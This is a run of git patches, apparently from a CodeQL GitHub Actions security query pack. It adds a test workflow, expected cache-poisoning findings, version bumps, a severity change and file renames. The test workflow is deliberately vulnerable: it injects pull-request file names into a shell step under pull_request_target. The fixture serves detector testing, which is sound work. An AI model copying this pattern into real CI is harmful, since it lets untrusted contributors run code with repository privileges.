Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From d13a937a5ddaa49ddd37043263fc77141694f957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:30:43 +0200 Subject: [PATCH 322/707] Update Cache Poisoning --- .../CWE-349/.github/workflows/test19.yml | 42 +++++++++++++++++++ .../CachePoisoningByCodeInjection.expected | 13 ++++++ 2 files changed, 55 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml new file mode 100644 index 000000000000..1f0e7291442c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml @@ -0,0 +1,42 @@ +name: Close Translation Pull Requests + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + + close-translation-prs: + + name: Close Translation Pull Requests + runs-on: ubuntu-latest + + steps: + - name: Get changed files + id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + + - name: Check the PR for translations + id: check + run: | + shopt -s nocasematch + if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then + echo "Found modified en_gb, likely a valid PR" + unset CLOSE + elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then + echo "Found modified strings.po, unwanted." + CLOSE="true" + elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then + echo "Found added strings.po, unwanted." + CLOSE="true" + elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then + echo "Found removed strings.po, unwanted." + CLOSE="true" + else + echo "No strings.po were modified or added, not a translation." + unset CLOSE + fi + echo ::set-output name=close::${CLOSE} + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected index 60c25e1cd92a..e0a5e8fd4b1b 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -1,7 +1,20 @@ edges +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | subpaths #select | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | From 49a2fd82b1473eaeb6b820ed57c90e58db24b332 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:32:11 +0200 Subject: [PATCH 323/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 48045dbf6792..9e87409504da 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.33 +version: 0.0.34 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2f79bddd77e5..343bd9d6a227 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.33 +version: 0.0.34 groups: - actions - queries From c45d4d37aa46a5af27b9016a9cc6366d89838c5d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:34:42 +0200 Subject: [PATCH 324/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9e87409504da..1999bd326a14 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.34 +version: 0.0.35 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 343bd9d6a227..bd34a5c91250 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.34 +version: 0.0.35 groups: - actions - queries From 3f0f75a7c5787eb6a4c7bd42a2ff85a2d8e0808f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 7 Jun 2024 10:05:39 +0200 Subject: [PATCH 325/707] Make CachePoisoning queries high severity --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index a6dc7e14fdd4..feef43164614 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -4,7 +4,7 @@ * @kind problem * @problem.severity error * @precision high - * @security-severity 9.3 + * @security-severity 7.5 * @id actions/cache-poisoning * @tags actions * security diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 8fdebdbde188..030dd872cb28 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -4,7 +4,7 @@ * @kind path-problem * @problem.severity error * @precision high - * @security-severity 9.3 + * @security-severity 7.5 * @id actions/cache-poisoning/code-injection * @tags actions * security From 92cd50393b485895391a61aadc7ba2053d76ddc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 7 Jun 2024 10:06:46 +0200 Subject: [PATCH 326/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1999bd326a14..5cfa47a5cdf6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.35 +version: 0.0.36 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index bd34a5c91250..65bb672183fe 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.35 +version: 0.0.36 groups: - actions - queries From ad1f35c86a7f7b957346747be585b5acf9431e05 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 327/707] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 12 ++- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 